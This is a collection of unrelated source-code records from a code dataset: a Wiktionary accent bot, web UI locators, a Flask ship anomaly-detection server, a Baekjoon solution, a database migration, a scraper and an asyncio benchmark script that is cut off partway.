trwords,\n verbose, pagemsg, expand_text, origt)\n return newterm, newtr\n\n# Outer wrapper, equivalent to find_accented_1() except outputs extra\n# log messages if --semi-verbose.\ndef find_accented(term, termtr, verbose, pagemsg, expand_text, origt):\n if semi_verbose:\n pagemsg(\"find_accented: Call with term %s%s\" % (term, \"//%s\" % termtr if termtr else \"\"))\n term, termtr = find_accented_1(term, termtr, verbose, pagemsg, expand_text,\n origt)\n if semi_verbose:\n pagemsg(\"find_accented: Return %s%s\" % (term, \"//%s\" % termtr if termtr else \"\"))\n return term, termtr\n\ndef join_changelog_notes(notes):\n accented_words = []\n other_notes = []\n for note in notes:\n m = re.search(\"^auto-accent (.*)$\", note)\n if m:\n accented_words.append(m.group(1))\n else:\n other_notes.append(note)\n if accented_words:\n notes = [\"auto-accent %s\" % \",\".join(accented_words)]\n else:\n notes = []\n notes.extend(other_notes)\n return \"; \".join(notes)\n\ndef check_need_accent(text):\n for word in re.split(\" +\", text):\n word = blib.remove_links(word)\n if u\"\\u0301\" in word or u\"ё\" in word:\n continue\n if not ru.is_monosyllabic(word):\n return True\n return False\n\ndef process_template(pagetitle, index, template, ruparam, trparam, output_line,\n find_accents, verbose):\n origt = unicode(template)\n saveparam = ruparam\n def pagemsg(text):\n msg(\"Page %s %s: %s\" % (index, pagetitle, text))\n def expand_text(tempcall):\n return blib.expand_text(tempcall, pagetitle, pagemsg, semi_verbose)\n if semi_verbose:\n pagemsg(\"Processing template: %s\" % unicode(template))\n if unicode(template.name) == \"head\":\n # Skip {{head}}. We don't want to mess with headwords.\n return False\n if isinstance(ruparam, list):\n ruparam, saveparam = ruparam\n if ruparam == \"page title\":\n val = pagetitle\n else:\n val = getparam(template, ruparam)\n valtr = getparam(template, trparam) if trparam else \"\"\n changed = False\n if find_accents:\n newval, newtr = find_accented(val, valtr, verbose, pagemsg, expand_text,\n origt)\n if newval != val or newtr != valtr:\n if ru.remove_accents(newval) != ru.remove_accents(val):\n pagemsg(\"WARNING: Accented page %s changed from %s in more than just accents, not changing\" % (newval, val))\n else:\n changed = True\n addparam(template, saveparam, newval)\n if newtr:\n if not trparam:\n pagemsg(\"WARNING: Unable to change translit to %s because no translit param available (Cyrillic param %s): %s\" %\n (newtr, saveparam, origt))\n elif unicode(template.name) in [\"ru-ux\"]:\n pagemsg(\"WARNING: Not changing or adding translit param %s=%s to ru-ux: origt=%s\" % (\n trparam, newtr, origt))\n else:\n if valtr and valtr != newtr:\n pagemsg(\"WARNING: Changed translit param %s from %s to %s: origt=%s\" %\n (trparam, valtr, newtr, origt))\n if not valtr:\n pagemsg(\"NOTE: Added translit param %s=%s to template: origt=%s\" %\n (trparam, newtr, origt))\n addparam(template, trparam, newtr)\n elif valtr:\n pagemsg(\"WARNING: Template has translit %s but lookup result has none, leaving translit alone: origt=%s\" %\n (valtr, origt))\n if check_need_accent(newval):\n output_line(\"Need accents (changed)\")\n else:\n output_line(\"Found accents\")\n if not changed and check_need_accent(val):\n output_line(\"Need accents\")\n if changed:\n pagemsg(\"Replaced %s with %s\" % (origt, unicode(template)))\n return [\"auto-accent %s%s\" % (newval, \"//%s\" % newtr if newtr else \"\")] if changed else False\n\ndef find_russian_need_vowels(find_accents, cattype, direcfile, save,\n verbose, startFrom, upTo):\n if direcfile:\n processing_lines = []\n for line in codecs.open(direcfile, \"r\", encoding=\"utf-8\"):\n line = line.strip()\n m = re.match(r\"^(Page [^ ]+ )(.*?)(: .*?:) Processing: (\\{\\{.*?\\}\\})( <- \\{\\{.*?\\}\\} \\(\\{\\{.*?\\}\\}\\))$\",\n line)\n if m:\n processing_lines.append(m.groups())\n\n for current, index in blib.iter_pages(processing_lines, startFrom, upTo,\n # key is the page name\n key = lambda x:x[1]):\n\n pagenum, pagename, tempname, repltext, rest = current\n\n def pagemsg(text):\n msg(\"Page %s(%s) %s: %s\" % (pagenum, index, pagetitle, text))\n def check_template_for_missing_accent(pagetitle, index, template,\n ruparam, trparam):\n def output_line(directive):\n msg(\"* %s[[%s]]%s %s: %s%s\" % (pagenum, pagename,\n tempname, directive, unicode(template), rest))\n return process_template(pagetitle, index, template, ruparam, trparam,\n output_line, find_accents, verbose)\n\n blib.process_links(save, verbose, \"ru\", \"Russian\", \"pagetext\", None,\n None, check_template_for_missing_accent,\n join_actions=join_changelog_notes, split_templates=None,\n pages_to_do=[(pagename, repltext)], quiet=True)\n if index % 100 == 0:\n output_stats(pagemsg)\n else:\n def check_template_for_missing_accent(pagetitle, index, template,\n ruparam, trparam):\n def pagemsg(text):\n msg(\"Page %s %s: %s\" % (index, pagetitle, text))\n def output_line(directive):\n pagemsg(\"%s: %s\" % (directive, unicode(template)))\n result = process_template(pagetitle, index, template, ruparam, trparam,\n output_line, find_accents, verbose)\n if index % 100 == 0:\n output_stats(pagemsg)\n return result\n\n blib.process_links(save, verbose, \"ru\", \"Russian\", cattype, startFrom,\n upTo, check_template_for_missing_accent,\n join_actions=join_changelog_notes, split_templates=None)\n\npa = blib.init_argparser(\"Find Russian terms needing accents\")\npa.add_argument(\"--cattype\", default=\"vocab\",\n help=\"Categories to examine ('vocab', 'borrowed', 'translation')\")\npa.add_argument(\"--file\",\n help=\"File containing output from parse_log_file.py\")\npa.add_argument(\"--semi-verbose\", action=\"store_true\",\n help=\"More info but not as much as --verbose\")\npa.add_argument(\"--find-accents\", action=\"store_true\",\n help=\"Look up the accents in existing pages\")\npa.add_argument(\"--no-cache\", action=\"store_true\",\n help=\"Disable caching head lookup results\")\n\nparams = pa.parse_args()\nsemi_verbose = params.semi_verbose or params.verbose\nglobal_disable_cache = params.no_cache\nstartFrom, upTo = blib.parse_start_end(params.start, params.end)\n\nfind_russian_need_vowels(params.find_accents, params.cattype,\n params.file, params.save, params.verbose, startFrom, upTo)\n\nblib.elapsed_time()\n","repo_name":"benwing4/WingerBot","sub_path":"find_russian_need_vowels.py","file_name":"find_russian_need_vowels.py","file_ext":"py","file_size_in_byte":25149,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"42080550552","text":"# !@coding :utf-8 \n# !@Time :2021/2/7 16:00\n# !@Author :LiuLei\n\n# 企业列表\nbusiness_list_btn = ('xpath', '//*[@name=\"menu-22001\"]')\nbusiness_check_page = ('xpath', '//li[text()=\"企业列表\"]')\n# 报表列表\nstatement_list_btn = ('xpath', '//*[@name=\"menu-22002\"]')\nstatement_check_page = ('xpath', '//li[text()=\"报表列表\"]')\n\npage_list = [business_list_btn, statement_list_btn]\ncheck_list = [business_check_page, statement_check_page]\n\n# 申报\ndeclare_btn = ('xpath', '//*[@name=\"btn-22002001\"]')\ndeclare_confirm = ('xpath', '//*[@value=\"继续申报\"]')\ndeclare_er = ('xpath', '//*[@id=\"XzjsModal\"]//*[text()=\"确认\"]')\n# 扣款\npayment_btn = ('xpath', '//*[@name=\"btn-22002002\"]')\n# 撤销申报\nrevocation_btn = ('xpath', '//*[@name=\"btn-22002003\"]')\nrevocation_confirm = ('id', 'confirmButton')\n# 设为零申报\nset_zero_btn = ('xpath', '//*[@name=\"btn-22002004\"]')\n# 设为税款申报\nset_tax_btn = ('xpath', '//*[@name=\"btn-22002005\"]')\n# 状态检查\ncheck_status = ('xpath', '//*[@name=\"btn-22002006\"]')\n# 企业查询\nbusiness_filter = ('id', 'filter-qycx')\npage_limt = ('xpath', '//*[@class=\"limit-select\"]')\n# 合计\ntotal = ('xpath', '//*[@id=\"pager\"]/div/span/label')\n# 选择全部\nselect_all = ('xpath', '//*[@class=\"checkbox-master\"]')\n# 查看\nview = '//tbody//tr[%s]//td[18]//*[contains(.,\"查看\")]'\n# 申报状态\ndeclare_status = '//tbody//tr[%s]//td[9]/span'\n# 作废状态\ninvalid_status = '//tbody//tr[%s]//td[12]/span'\n# 申报表名称\ndeclare_name = '//tbody//tr[%s]//td[4]'\n# 显示异常\nshow_error = ('id', 'filter-xsycyy')\n# 撤销状态\nfetch_status = '//tbody//tr[%s]//td[8]'\n# 税款\npay_tax = '//tbody//tr[%s]//td[14]'\n# 勾选框\nselect_box = '//tbody//tr[%s]//td[1]/input'\n# 企业名称\nname = '//tbody//tr[%s]//td[3]'\n# 异常内容\nerror = '//tbody//tr[%s]//td[13]'\n","repo_name":"James-Bond-Liu/Auto_Test","sub_path":"company_project/weeapi_autotest/element/WeEasy/el_declare_page.py","file_name":"el_declare_page.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9916470661","text":"# 세훈이의 선물가게\r\n\"\"\"\r\n세훈이는 선물가게를 운영한다. 세훈이의 선물가게는 특이��게도 손님이 어떤 선물을 구매할지 선택할 수가 없다.\r\n대신 세훈이의 취향으로 랜덤하게 준비된 선물 중 몇 개를 구매할 것인지, 파란색과 빨간색 중 어떤 색으로 포장 받을 것인지만 결정해 주문할 수 있다.\r\n\r\n상민이와 지수는 세훈이의 가게에서 선물 포장을 맡은 아르바이트생이다.\r\n손님들은 파란색 포장지를 원하면 상민이에게, 빨간색 포장지를 원하면 지수에게 주문을 한다.\r\n두 사람은 각자 주문을 받으면 그때부터 포장을 시작하는데, 현재 남아있는 선물 중 가장 앞에 있는 선물을 가져와 포장하고 주문을 받은 개수만큼 이를 반복하는 형태다.\r\n이때 선물 하나를 포장하는 데 상민이는 A초, 지수는 B초가 걸린다.\r\n두 사람 모두 받거나 밀린 주문이 없는데 미리 선물을 가져오거나 포장하는 일은 없으며,\r\n두 사람이 동시에 선물을 가져올 때는 알바짬이 조금 더 있는 상민이가 먼저 가져오고, 지수가 그 뒤의 선물을 가져온다.\r\n\r\n세훈이는 어제 구매한 선물이 망가져 있다는 항의 전화를 받았다.\r\n자신이 준비한 선물에는 문제가 없었기에 손님에게 포장지의 색을 물었지만, 손님은 자신이 받은 선물이 무엇인지만 말하며 화를 낼 뿐이었다.\r\n어쩔 수 없이 세훈이는 어제 가게를 방문한 손님들의 주문 내역을 보고 그 선물을 누가 포장했는지 파악하려 한다.\r\n\r\n방문한 손님의 수와 각 손님이 주문한 시각, 선택한 포장지, 포장 받을 선물의 개수가 주어졌을 때 상민이와 지수가 각자 어떤 선물들을 포장했는지 알아내는 프로그램을 작성해보자.\r\n\"\"\"\r\nimport sys\r\n\r\nmakingTimeBlue, makingTimeRed, customerCount = map(int, sys.stdin.readline().rstrip().split())\r\nblueStartTime = 0\r\nredStartTime = 0\r\npackagedProducts = []\r\n\r\n\r\ndef package(orderQuantity, startTime, selectedTime, color):\r\n for j in range(orderQuantity):\r\n product = (startTime + (j * selectedTime), color)\r\n packagedProducts.append(product)\r\n\r\n\r\nfor i in range(customerCount):\r\n orderAt, color, orderQuantity = sys.stdin.readline().rstrip().split()\r\n orderAt = int(orderAt)\r\n orderQuantity = int(orderQuantity)\r\n\r\n if color == \"B\":\r\n selectedTime = makingTimeBlue\r\n startTime = max(orderAt, blueStartTime)\r\n package(orderQuantity, startTime, selectedTime, color)\r\n blueStartTime = startTime + (makingTimeBlue * orderQuantity)\r\n else:\r\n selectedTime = makingTimeRed\r\n startTime = max(orderAt, redStartTime)\r\n package(orderQuantity, startTime, selectedTime, color)\r\n redStartTime = startTime + (makingTimeRed * orderQuantity)\r\n\r\nsortStandard = [\"B\", \"R\"]\r\npackagedProducts.sort(key=lambda x: (x[0], sortStandard.index(x[1])))\r\nblueMade = []\r\nredMade = []\r\nfor i in range(len(packagedProducts)):\r\n if packagedProducts[i][1] == \"B\":\r\n blueMade.append(i+1)\r\n else:\r\n redMade.append(i+1)\r\nprint(len(blueMade))\r\nprint(*blueMade)\r\nprint(len(redMade))\r\nprint(*redMade)\r\n\r\n\r\n\"\"\"\r\n2 2 2\r\n1 B 5\r\n1 R 5\r\n\r\n1 2 3\r\n1 B 10\r\n1 R 3\r\n2 R 3\r\n\r\n\r\n\"\"\"","repo_name":"JunInMay/journey-to-baekjoon","sub_path":"baekjoon/baekjoon_17225.py","file_name":"baekjoon_17225.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23539203695","text":"import os\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom flask import Flask,redirect,url_for,render_template,request,jsonify,Response\r\nimport pickle\r\nfrom sklearn.metrics import accuracy_score\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\nimport json\r\nfrom sklearn.svm import OneClassSVM\r\nfrom sklearn.preprocessing import StandardScaler,Normalizer\r\nfrom sklearn.metrics import precision_score, recall_score, f1_score, roc_auc_score\r\nfrom tensorflow.keras.layers import Dense, LSTM, Dropout, RepeatVector, TimeDistributed\r\nfrom tensorflow.keras.models import Sequential\r\nimport math\r\nimport joblib\r\nimport geopy.distance\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.ensemble import IsolationForest\r\nimport plotly.graph_objects as go\r\nfrom sklearn.metrics import mean_squared_error,mean_absolute_error,r2_score\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.impute import SimpleImputer\r\n\r\n\r\nnp.random.seed(1)\r\ntf.random.set_seed(1)\r\napp = Flask(__name__)\r\n\r\nprint('Reading simulation csv')\r\n# df = pd.read_csv('data/complete_journeys.csv')\r\ndf = pd.read_csv('all_ships.csv')\r\n# df = pd.read_csv('data/model_data_preprocess.csv')\r\n\r\nprint('Reading timestamp information')\r\n# Intervals = pd.read_csv('data/interval_list.csv')\r\nIntervals = pd.read_csv('all_ships_interval_list.csv')\r\n\r\n# ANOMALY 1 DATASET///////////////////////////////////////////////\r\n# df_anomalous = pd.read_csv('data/test_route_aliza.csv')\r\n# list_for_models_anomaly_1 = []\r\nlist_for_models = []\r\n\r\n# PORTS /////////////////////////////////////////////////////////\r\nprint('Reading Port information')\r\nports_df = pd.read_csv('ports.csv')\r\nports_df = ports_df.drop('Unnamed: 0',axis=1)\r\n\r\n# SORTING ///////////////////////////////////////////////////////\r\nprint('Sorting by time')\r\nSorted_by_time = df\r\nSorted_by_time = Sorted_by_time.sort_values('BaseDateTime').reset_index().drop('index',axis=1)\r\n\r\n# Sorted_by_time_anomalous_1 = df_anomalous\r\n# Sorted_by_time_anomalous_1 = Sorted_by_time_anomalous_1.sort_values('BaseDateTime').reset_index().drop('index',axis=1)\r\n# SORTED/////////////////////////////////////////////////////////\r\n#This data will be sent at the start of website for ship information\r\nprint(\"Extracting Static data\")\r\nStatic_data = df\r\nStatic_data = Static_data.drop(['BaseDateTime','LAT','LON','SOG','COG','Cargo','TransceiverClass','SourceLat','SourceLon','DestLat','DestLon'],axis=1)\r\nStatic_data = Static_data.groupby('MMSI').first()\r\nStatic_data = Static_data.reset_index()\r\nStatic_data[\"MMSI\"] = Static_data[\"MMSI\"].astype(str)\r\n# print('Extracting timestamps')\r\n# Timer = Sorted_by_time['BaseDateTime'].unique()\r\nTimestamps = 0\r\n\r\n\r\n# MODELS ////////////////////////////////////////////////////////\r\nanomaly_1_model = tf.keras.models.load_model('route_model.h5')\r\n\r\n\r\nanomaly_2_model = ''\r\nfilename = 'isolation_forest_model.pkl'\r\n# Load the saved model from the file\r\nwith open(filename, 'rb') as file:\r\n anomaly_2_model = pickle.load(file)\r\n\r\n\r\nscaler=Normalizer()\r\nbounds = pd.read_csv(\"speed_bounds_update.csv\")\r\n# # Saved model file \r\n# with open('model_rf_v3_norm.pkl', 'rb') as f:\r\n# rf_regressor = pickle.load(f)\r\n\r\ndef anomaly_1(df_temp):\r\n cols_keep=['LAT','LON','Heading','SourceLat','SourceLon','DestLat','DestLon']\r\n df_temp = df_temp.drop([col for col in df_temp.columns if col not in cols_keep], axis=1)\r\n df_temp=df_temp.dropna(axis=0)\r\n if df_temp.shape[0] > 0:\r\n scaler = StandardScaler()\r\n data = scaler.fit_transform(df_temp)\r\n y_pred=1\r\n anomaly=0\r\n y_pred=anomaly_1_model.predict(data)\r\n mse=np.mean(np.square(y_pred-data),axis=1)\r\n threshold=1.1\r\n binary_predictions = np.where(mse <= threshold, 1, 0)\r\n unique_values, value_counts = np.unique(binary_predictions, return_counts=True)\r\n most_common_value = unique_values[np.argmax(value_counts)]\r\n if most_common_value == 0:\r\n return 1\r\n else:\r\n return -1\r\n return 1\r\n\r\ndef Cargo_Anomaly(data):\r\n selected_features = ['SourceLat', 'SourceLon', 'DestLat', 'DestLon', 'LAT','LON','distance','segment_speed','VesselType','Cargo']\r\n data = data[selected_features]\r\n # Predict anomaly scores for the new data\r\n anomaly_scores = anomaly_2_model.decision_function(data)\r\n predictions = anomaly_2_model.predict(data)\r\n # Step 6: Analyze Results\r\n anomaly_df = pd.DataFrame({'AnomalyScore': anomaly_scores, 'IsAnomaly': predictions}, index=data.index)\r\n anomaly_df['IsAnomaly'] = anomaly_df['IsAnomaly'] # Convert -1/1 labels to boolean values\r\n return anomaly_df['IsAnomaly'].iloc[-1]\r\n\r\n\r\ndef anomaly_2_distance(lat1, lon1, lat2, lon2):\r\n # convert decimal degrees to radians\r\n lat1, lon1, lat2, lon2 = map(math.radians, [lat1, lon1, lat2, lon2])\r\n # haversine formula\r\n dlon = lon2 - lon1\r\n dlat = lat2 - lat1\r\n a = math.sin(dlat / 2) ** 2 + math.cos(lat1) * \\\r\n math.cos(lat2) * math.sin(dlon / 2) ** 2\r\n c = 2 * math.asin(math.sqrt(a))\r\n r = 6.378e+6 # Radius of earth in kilometers\r\n return c * r\r\n\r\ndef anomaly_2_speed(vessel_points1):\r\n vessel_points1['BaseDateTime'] = pd.to_datetime(vessel_points1['BaseDateTime'])\r\n vessel_points1 = vessel_points1.sort_values(['BaseDateTime'])\r\n vessel_points1 = vessel_points1.drop_duplicates(subset=[\"LAT\", \"LON\"], keep='first')\r\n vessel_points1 = vessel_points1.dropna()\r\n\r\n vessel_points1['time_diff'] = (vessel_points1['BaseDateTime'].diff().dt.total_seconds())\r\n\r\n for i in range(1, len(vessel_points1)):\r\n lat1, lon1 = vessel_points1.iloc[i - 1]['LAT'], vessel_points1.iloc[i-1]['LON']\r\n lat2, lon2 = vessel_points1.iloc[i]['LAT'], vessel_points1.iloc[i]['LON']\r\n dist = anomaly_2_distance(lat1, lon1, lat2, lon2)\r\n vessel_points1.at[vessel_points1.index[i], 'distance'] = dist\r\n\r\n vessel_points1['segment_speed'] = (vessel_points1['distance']) / vessel_points1['time_diff']\r\n\r\n # vessel_points1 = vessel_points1.drop(index=vessel_points1[vessel_points1['distance'] == 0.0].index)\r\n vessel_points1 = vessel_points1.drop(index=vessel_points1[vessel_points1['time_diff'] == 0.0].index)\r\n # vessel_points1 = vessel_points1.drop(index=vessel_points1[vessel_points1['segment_speed'] == 0.0].index)\r\n vessel_points1 = vessel_points1.dropna()\r\n\r\n return vessel_points1\r\n\r\ndef anomaly_2(X_test):\r\n vessel_data = anomaly_2_speed(X_test)\r\n X_Test_first = vessel_data[['SourceLat', 'SourceLon', 'DestLat', 'DestLon', 'LAT', 'LON', 'time_diff', 'distance']].values\r\n X_Test_cargo = vessel_data\r\n return Cargo_Anomaly(X_Test_cargo)\r\n\r\n\r\n\r\ndef anomaly_3(X_test,bounds):\r\n # # Calculate distance, time difference as model features\r\n # vessel_data = calculate_speed(X_test)\r\n # X_Test_first = vessel_data[['SourceLat', 'SourceLon', 'DestLat', 'DestLon','LAT', 'LON', 'Heading','SOG','time_diff', 'distance']].values\r\n \r\n # # Save the speed ranges for the Source and Destination of input data\r\n # filtered_data = bounds[\r\n # (bounds['SourceLatitude'] == X_test['SourceLat'].iloc[0]) &\r\n # (bounds['SourceLongitude'] == X_test['SourceLon'].iloc[0]) &\r\n # (bounds['DestLatitude'] == X_test['DestLat'].iloc[0]) &\r\n # (bounds['DestLongitude'] == X_test['DestLon'].iloc[0])\r\n # ]\r\n\r\n # # Check if any matching rows exist\r\n # if not filtered_data.empty:\r\n # # Extract upper bound and lower bound\r\n # upper_bound = filtered_data['upper_bound'].values[0]\r\n # lower_bound = filtered_data['lower_bound'].values[0]\r\n\r\n # #predict speed of vessel it should be moving at\r\n # X_scaled = scaler.transform(X_Test_first)\r\n # segment_speed_pred = rf_regressor.predict(X_scaled)\r\n # data_length = len(X_test) - 1\r\n # #save anomalous indexes from the original data frame\r\n # anomalies_indices = np.where((segment_speed_pred > upper_bound) | (segment_speed_pred < lower_bound))[0]\r\n # #return -1 for anomaly and 0 for no anomaly\r\n # if anomalies_indices.size > 0:\r\n # last_anomaly_index = anomalies_indices[-1]\r\n # if last_anomaly_index == data_length:\r\n # return -1\r\n # else:\r\n # return 0\r\n # else:\r\n # return 0\r\n return 1\r\n\r\n\r\n\r\n\r\n\r\n#////////////////////////////////////////////////////////////////////////// WEBPAGES //////////////////////////////////////////////////////////////////////////\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route('/favicon.ico')\r\ndef favicon():\r\n return send_from_directory(os.path.join(app.root_path, 'static'),'images/favicon.ico', mimetype='image/vnd.microsoft.icon')\r\n\r\n@app.route('/Static_Data')\r\ndef Static_Data():\r\n return Static_data.to_json()\r\n\r\n@app.route('/Port_info')\r\ndef Port_info():\r\n return ports_df.to_json()\r\n\r\n@app.route('/Current_Time_Information')\r\ndef Current_Time_Information():\r\n global Timestamps\r\n global list_for_models\r\n \r\n temp_df = Sorted_by_time.iloc[Intervals['StartIndex'][int(Timestamps)]:Intervals['EndIndex'][int(Timestamps)]].reset_index().drop('index',axis=1)\r\n for j in range(0,len(temp_df['MMSI'])):\r\n index = -1\r\n temp_val = temp_df['MMSI'][j]\r\n for k in range(0,len(list_for_models)):\r\n if list_for_models[k][0] == temp_val:\r\n index = k\r\n break\r\n if index == -1:\r\n row = temp_df.loc[j]\r\n new_df = pd.DataFrame(row).transpose()\r\n temp_list = [temp_val,new_df]\r\n list_for_models.append(temp_list)\r\n else:\r\n s = pd.Series(temp_df.loc[j])\r\n list_for_models[index][1].loc[len(list_for_models[index][1])] = s.values\r\n list_for_models[index][1] = list_for_models[index][1].sort_index()\r\n \r\n # temp_df_anomalous_1 = Sorted_by_time_anomalous_1.iloc[Intervals['StartIndex'][int(Timestamps)]:Intervals['EndIndex'][int(Timestamps)]].reset_index().drop('index',axis=1)\r\n # for j in range(0,len(temp_df_anomalous_1['MMSI'])):\r\n # index = -1\r\n # temp_val = temp_df_anomalous_1['MMSI'][j]\r\n # for k in range(0,len(list_for_models_anomaly_1)):\r\n # if list_for_models_anomaly_1[k][0] == temp_val:\r\n # index = k\r\n # break\r\n # if index == -1:\r\n # row = temp_df_anomalous_1.loc[j]\r\n # new_df = pd.DataFrame(row).transpose()\r\n # temp_list = [temp_val,new_df]\r\n # list_for_models_anomaly_1.append(temp_list)\r\n # else:\r\n # s = pd.Series(temp_df_anomalous_1.loc[j])\r\n # list_for_models_anomaly_1[index][1].loc[len(list_for_models_anomaly_1[index][1])] = s.values\r\n # list_for_models_anomaly_1[index][1] = list_for_models_anomaly_1[index][1].sort_index()\r\n \r\n temp = Sorted_by_time.iloc[Intervals['StartIndex'][int(Timestamps)]:Intervals['EndIndex'][int(Timestamps)]].reset_index().drop('index',axis=1).to_json()\r\n Timestamps = Timestamps + 1\r\n return temp\r\n\r\n@app.route('/ai_models')\r\ndef ai_models():\r\n anomalies = []\r\n for i in range(0,pd.DataFrame(list_for_models).shape[0]):\r\n predictions = []\r\n predictions.append(anomaly_1(list_for_models[i][1]))\r\n if list_for_models[i][1].shape[0] > 2:\r\n predictions.append(anomaly_2(list_for_models[i][1]))\r\n predictions.append(anomaly_3(list_for_models[i][1], bounds))\r\n curr_MMSI = list_for_models[i][0]\r\n time_stamp = list_for_models[i][1].reset_index().drop(\"index\",axis=1)[\"BaseDateTime\"][0]\r\n anomalies.append([curr_MMSI, str(time_stamp), predictions])\r\n anomalies_df = pd.DataFrame(anomalies)\r\n return anomalies_df.to_json()\r\n # return pd.DataFrame(list_for_models).to_json()\r\n\r\n@app.route(\"/search\", methods=[\"POST\"])\r\ndef search():\r\n query = request.data.decode('utf-8')\r\n index = Static_data.loc[Static_data[\"MMSI\"] == query].index[0]\r\n row = Static_data.loc[Static_data['MMSI'] == query]\r\n imo_number = row['IMO'].values[0].astype(str)\r\n main_folder = imo_number[0:4]\r\n file_one = imo_number[0:6] + \"_1\"\r\n file_two = imo_number[0:6] + \"_2\"\r\n file_address_one = 'static/images/ship_images/' + main_folder + '/' + file_one\r\n file_address_two = 'static/images/ship_images/' + main_folder + '/' + file_two\r\n addresses = {\"address_one\" : file_address_one , \"address_two\" : file_address_two}\r\n temp_series = pd.Series(addresses)\r\n temp_data = pd.concat([Static_data.loc[index],temp_series])\r\n return temp_data.to_json()\r\n\r\n#////////////////////////////////////////////////////////////////////////// MAIN //////////////////////////////////////////////////////////////////////////\r\nif __name__=='__main__':\r\n app.run(debug=False,port=8000)","repo_name":"RidaIftikhar14/MLOPS-FYP-Maritime-AI","sub_path":"app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":12814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70180012921","text":"from typing import *\n\nfrom .mixins import *\nfrom .kernel import Kernel\nfrom ..bases import RegressorBase\n\n\n@RegressorBase.register(\"svr\")\nclass SVR(CoreSVRMixin, SVRMixin, RegressorBase):\n def __init__(\n self,\n *,\n eps: float = 0.0,\n kernel: str = \"rbf\",\n optimizer: str = \"rmsprop\",\n lb: Union[str, float] = \"auto\",\n kernel_config: Dict[str, Any] = None\n ):\n self._eps = eps\n self._opt = optimizer\n self._lb = self._raw_lb = lb\n if kernel_config is None:\n kernel_config = {}\n self._kernel = Kernel(kernel, **kernel_config)\n self._normalize_labels = True\n\n\n__all__ = [\"SVR\"]\n","repo_name":"carefree0910/carefree-ml","sub_path":"cfml/models/svm/svr.py","file_name":"svr.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"40"} +{"seq_id":"17811114934","text":"\"\"\"create apt_num on address table\n\nRevision ID: d620899a4069\nRevises: d9ed7cd0842f\nCreate Date: 2023-06-22 21:44:23.445290\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd620899a4069'\ndown_revision = 'd9ed7cd0842f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n op.add_column(\"address\",sa.Column(\"apt_num\",sa.String(),nullable=True))\n\n\n\ndef downgrade() -> None:\n op.drop_column(\"address\",\"apt_num\")\n","repo_name":"ChiaChiaPing/fastapi-projects","sub_path":"fastapi/alembic/versions/d620899a4069_create_apt_num_on_address_table.py","file_name":"d620899a4069_create_apt_num_on_address_table.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34877424504","text":"import os\nos.chdir(os.path.dirname(os.path.realpath(__file__)))\n\nfrom bs4 import BeautifulSoup\nimport urllib2\nimport re\n\nwiki = \"https://en.wikipedia.org/wiki/List_of_infectious_diseases\"\nheader = {'User-Agent': 'Mozilla/5.0'} #Needed to prevent 403 error on Wikipedia\nreq = urllib2.Request(wiki,headers=header)\npage = urllib2.urlopen(req)\nsoup = BeautifulSoup(page, 'html.parser')\n\ntable = soup.find(\"table\", { \"class\" : \"wiki table sortable\" })\n\nwith open('..\\\\lists\\\\inf_diseases.txt', 'w') as f:\n for row in table.findAll(\"tr\"):\n cells = row.findAll(\"td\")\n write_to_file = \"\"\n for i in cells[0].strings:\n write_to_file += i\n write_to_file += \"\\n\"\n f.write(write_to_file.encode('utf-8'))\n","repo_name":"cgibbs/PlinyGen","sub_path":"greppers/grep_inf_disease.py","file_name":"grep_inf_disease.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9917632740","text":"#Program with a recursive function to calculate whether or not a string is a palindrome\r\n#KNNSAD001\r\n#Assignment 8\r\n\r\n#inserting word-(string)- to be evaluated by function\r\ninsert_string = input('Enter a string:\\n')\r\n\r\ndef palindrome (insert_string):\r\n \r\n if len(insert_string)<1:\r\n print ('Palindrome!')\r\n \r\n else:\r\n \r\n #if statement to evaluate if the first and last letters are the same \r\n if insert_string[0]==insert_string[-1]:\r\n \r\n #the recursive process that will decrease the length of a word by initiating previous step with subsequent characters \r\n return palindrome(insert_string[1:-1])\r\n else:\r\n print ('Not a palindrome!')\r\n \r\npalindrome(insert_string)","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/knnsad001/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8619183183","text":"'''\nA simple script to compare multi threading with asyncio in a high I/O task.\nIt is fetching the same url, which points to an image (or whatever you wish),\nboth with multi threading and with asyncio.\n'''\n\nfrom timeit import default_timer\nimport asyncio\nfrom prettytable import PrettyTable\n\nfrom multi_threading import fetch_all\nfrom async_io import fetch_async\n\n\nif __name__ == '__main__':\n\n # Table header.\n t = PrettyTable(['Request Count', 'Multithreading', 'AsyncIO', 'Difference', 'Winner'])\n\n # Insert your URL.\n url = \"***\"\n\n # How many times to download.\n indexes = [1, 10, 100, 500, 1000]\n\n for i in indexes:\n\n urls = [url] * i\n\n start = default_timer() \n\n responses = fetch_all(urls)\n\n # Elapsed time.\n delta_multi = default_timer() - start\n\n start = default_timer() \n\n loop = asyncio.get_event_loop()\n future = asyncio.ensure_future(fetch_async(loop, i, url))\n loop.run_until_complete(future)\n responses = future.result()\n\n # Elapsed time.\n 